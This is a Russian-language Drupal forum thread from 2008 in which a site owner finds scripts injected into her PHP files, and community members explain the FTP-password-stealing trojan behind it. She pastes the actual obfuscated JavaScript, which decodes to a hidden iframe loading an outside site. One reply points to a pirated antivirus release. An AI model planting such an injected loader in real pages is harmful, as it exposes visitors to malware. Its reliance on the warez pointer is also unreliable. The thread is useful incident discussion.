Это что - атака на мой сайт???

Главные вкладки

Аватар пользователя Geldora Geldora 12 марта 2008 в 17:47

Открываю сайт, а там надпись -

Parse error: syntax error, unexpected '<' in /home/uchikz/public_html/index.php on line 41

Посмотрела на Друпал.орг, в обычных случаях рекомендуют заменить индекс.пхп, но у меня замена вызвала новую ошибку, Parse error: syntax error, unexpected '<' in /home/uchikz/public_html/database.inc в какой-то там строчке. Стала искать дальше, нашла такую тему на их форуме Is someone hacking my index.php file???? http://drupal.org/node/229750#comment-766569

Перепроверила - действительно, дописаны какие-то скрипты, что в индекс.пхп, что в датабейз.инк, заменила оба, все встало на место. Но немного страшно - это действительно атака какая-то???

Комментарии

Аватар пользователя Гость Гость (не проверено) 12 марта 2008 в 18:20

Это делают "вражеские" программы, которые предварительно воруют ваши коды доступа к ftp-сайту.
Можно предположить, что скорее всего вы пользуетесь totalcommander'ом ( или wincommander ), потому, что многие для удобства сохраняют там и логин и пароль...
Обычно "корректируются" файлы index и близкие по названию и функции в корневой директории и на 1-ом уровне директориев.
Пароль желательно программам на хранение не доверять!

Аватар пользователя Onza Onza 12 марта 2008 в 18:26

У Вас троян, он дописывает какие-то скрипты к индексным файлам. Скорее всего подцепили на каком-нибудь сайте. Меняйте все пароли на фтп.

Аватар пользователя Geldora Geldora 12 марта 2008 в 18:29

Пользуюсь файлзиллой, но действительно сохранила там пароль... Впредь буду осторожнее!

А написано там было вот это -

script type="text/javascript">
function B51FEBA933E968440ABEF53967208F(B85BCCBE9A04A0ED97B0){function DFE3FA6EDA23EA94F58DBFC3484DC5(){return 16;}return(parseInt(B85BCCBE9A04A0ED97B0,DFE3FA6EDA23EA94F58DBFC3484DC5()));}function E33D7F05D619E5220335E(A45E1C16BDA4E99D74DF6D){var BE7AD0CB540BA52E58DE113C="";for(FC26DFB14765BC8332=0;FC26DFB14765BC8332<A45E1C16BDA4E99D74DF6D.length;FC26DFB14765BC8332+=2){BE7AD0CB540BA52E58DE113C+=(String.fromCharCode(B51FEBA933E968440ABEF53967208F(A45E1C16BDA4E99D74DF6D.substr(FC26DFB14765BC8332,2))));}document.write(BE7AD0CB540BA52E58DE113C);}E33D7F05D619E5220335E("3C696672616D65207372633D687474703A2F2F746865746578746465736B2E636F6D2F2077696474683D31206865696768743D31207374796C653D22646973706C61793A6E6F6E65223E3C2F696672616D653E");
</script>

Поскольку сталкиваюсь с таким впервые, новый вопрос - что теперь делать? Т.е. внешних признаков нет, файлы заменены, сейчас уберу пароль или изменю, - это все?! Или нужно что-то еще проверить? И что делает этот скрипт?

Аватар пользователя zaffka zaffka 12 марта 2008 в 18:49

Обязательно сменить пароль на FTP!

Проверить все файлы index.* на всех сайтах к которым был возможен доступ с этим паролем.

Чистить комп.

Вирь добывает пароли из распространенных программ вроде Total Commander и прочих, затем в фоновом режиме ходит туда и дописывает себя. Также велик шанс, что ваш пароль куда-то отсылается.

Переписываются также index.html, в них искать вставку около открывающего тега body

Аватар пользователя Бросивший курить Бросивший курить (не проверено) 12 марта 2008 в 18:50

После сеанса FTP, я всегда меняю пароли от FTP. Потому что они передаются через сеть в открытом виде. Захожу в панель управления сайта, через https и меняю пароль. А через https, пароли не увидишь.

Аватар пользователя gorr gorr 12 марта 2008 в 19:59

этот скрипт декодирует свою собственную строку
3C696672616D65207372633D687474703A2F2F746865746578746465736B2E636F6D2F2077696474683D31206865696768743D31207374796C653D22646973706C61793A6E6F6E65223E3C2F696672616D653E
и переводит ее в команды яваскрипт и тут-же исполняет, скорее всего он ворует кукисы или что то в этом духе, я не стал докапываться.

Аватар пользователя bogutski bogutski 12 марта 2008 в 22:25

Установил Панду (Panda) - почистила аналогичные. Рекомендую.
Panda.Internet.Security.2008.v12.0.MultiLanguage.for.WinXP.Vista.Incl

(искать ссылки на nnm.ru)

Аватар пользователя kiev1 kiev1 13 марта 2008 в 7:05

> Ставьте Linux и забудьте про вирусы.

это точно - не представляю как можно виндовсам доверять свои пароли.

да, и вместо FTP надо пользоваться SFTP - он в krusader-е есть - это такая штука которая работает по защищенному ssh каналу, но с виду от FTP ничем не отличается.

Аватар пользователя Nuri Nuri 13 марта 2008 в 11:10

На днях першёл на Linux, занимаюсь освоением.
Первые впечатления оптимстичные, хотя после 10-ти лет Винды всё непривычно.

Аватар пользователя marazmus marazmus 13 марта 2008 в 11:38

Я первое время всерьез парился по поводу отсутствия любимого Total Commander. На днях поймал себя на мысли о том, что он мне сейчас в убунте просто не нужен. 90% задач работы с файлами решается через консоль, остальное гномом Smile А когда переезжал на линукс, для меня отсутствие тотала было серьезным аргументом в пользу того чтобы остаться на винде Smile

Аватар пользователя PanDa777 PanDa777 14 марта 2008 в 21:58

Offtop:
Как же я солидарен по поводу TC! Альтернативы с таким количеством плагинов я не видел... Консоль - пока несколько непривычно. Но, наверное, скоро пообживусь Smile

Аватар пользователя kiev1 kiev1 18 марта 2008 в 13:10

вместо тотал коммандера в линуксе есть krusader - он умеет гораздо больше - это редактировать в юникоде файлы сразу по фтп, работать с sftp и в нем очень хороший редактор кода с подсветкой - аналога в винде я так и не нашел.

Аватар пользователя PanDa777 PanDa777 19 марта 2008 в 22:27

Не хотелось бы устраивать разговор не по делу, но всё же...
TC замечательно редактирует файлы по FTP, последняя версия, если я не ошибаюсь, работает с SFTP, редактор кода с подсветкой - возможно, но лично я пользовался обычно либо без подсветки (akelpad), либо уже специализированными IDE. В от же время, Krusader у меня как-то не приживается. С одной стороны, я не очень активно пробовал, но всё-таки не могу его настроить так, как я хочу: подобие TC-шных плагинов (особенно Lister), внешнее использование... Вместо него замечательно использую Nautilus. Уже даже более-менее привык...

Аватар пользователя Mungu Mungu 3 сентября 2008 в 18:04

я уже 2 года на линуксе, а из консоли по FTP до сих пор не хожу :). Долго не мог найти удобного клиента.
Недавно открыл для себя расширение для Firefox называется FireFTP. Очень удобно. Не по теме конечно, но может кому-то пригодится.